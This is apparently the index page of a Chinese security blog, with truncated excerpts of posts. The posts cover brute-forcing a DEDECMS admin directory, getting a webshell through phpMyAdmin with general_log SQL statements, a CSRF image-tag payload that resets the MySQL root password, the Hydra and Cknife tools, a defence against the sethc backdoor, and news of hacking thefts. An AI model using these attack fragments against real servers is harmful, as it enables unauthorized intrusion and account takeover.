WIN服务器爆破DEDECMS后台目录

利用脚本python: #!/usr/bin/env python '''/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ ''' import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = ""...

- 阅读全文 -

西安破获一起虚拟货币被盗案 涉案金额达6亿人民币

央广网西安8月19日消息(记者温超陕西台记者拓紫云)据中国之声《新闻纵横》报道,近年来,比特币等虚拟货币以极其快速的资产价格涨幅,成为全球市场关注的焦点,而其安全问题也备受关注。据国外媒体报道称,仅在2018年上半年,“黑客”就窃取了价值7.31亿美元,约合人民币48亿元的加密货币。而在国内,西安警方日前成功破获一起网络“黑客”盗窃虚拟货币案件,涉案金额高达6亿元人民币。破获这起案件历时半年多,破...

- 阅读全文 -

kali2018.2源

一、更新 #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #中科大 deb http://mirrors.ustc.edu.cn/kali kali-...

- 阅读全文 -

三个sql语句拿下phpmyadmin的shell

三个sql语句拿下phpmyadmin的shell 首先要知道路径 一句一句的执行 --------------------------------------------------------- set global general_log='on'; --------------------------------------------------------- SET global ge...

- 阅读全文 -

phpMyAdmin 4.7.x CSRF 漏洞利用

修改root密码: 保存为:webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="d...

- 阅读全文 -

禁止sethc.exe运行 防止3389的sethc后门

以Windows 2003为例,启动Windows 2003组策略 点“开始”,在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键,此时可以看到一个“不要运行指定的Windows应用程序”选项,双击该选项,在“策略”选项卡中选择“启用”选项,启动Windows 2003禁止运行指定应用程序的功能,单击“不允许的应用程序的列表”中的“显示”按钮,打开列表框,在列表框...

- 阅读全文 -

跨平台版中国菜刀:Cknife介绍

Burp已经成了绿帽子门必不可少的工具,相信大家都装有Java环境,本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月,除了打飞机的时间基本就在写这货了,这里要感谢...

- 阅读全文 -

利用系统漏洞男子盗1300万 花400多万打赏女主播

21岁的男子胡某在购买优酷会员礼包时发现,在自己账户余额不足时,支付宝平台会向其账户退款。于是从2015年9月起,胡某利用自己偶然发现的这一系统漏洞,半年里窃取优酷网所属的合一信息技术(北京)有限公司(下称合一公司)10余万笔资金,共计1300余万元。 如此巨款,胡某除了自己消费挥霍外,还拿出其中的400多万打赏了网络直播网站的女主播,其中最多的一次,“赏”了女主播5万元。今天上午,市一中院开庭审...

- 阅读全文 -

Linux下暴力破解工具Hydra详解

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to...

- 阅读全文 -

phpmyadmin新姿势getshell

旁白:在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell? 首先环境如下: OS:Windows 2003 WAF:Safe Dog 4.0正式版 phpmyadmin:4.7(许多都可以) Mysql:5.5+ PHP:5.3 Apache:2.x 目前 into outfile 已经被禁用,并且WAF也会在写入文件的时候拦截。 那么我们尝试通过一个...

- 阅读全文 -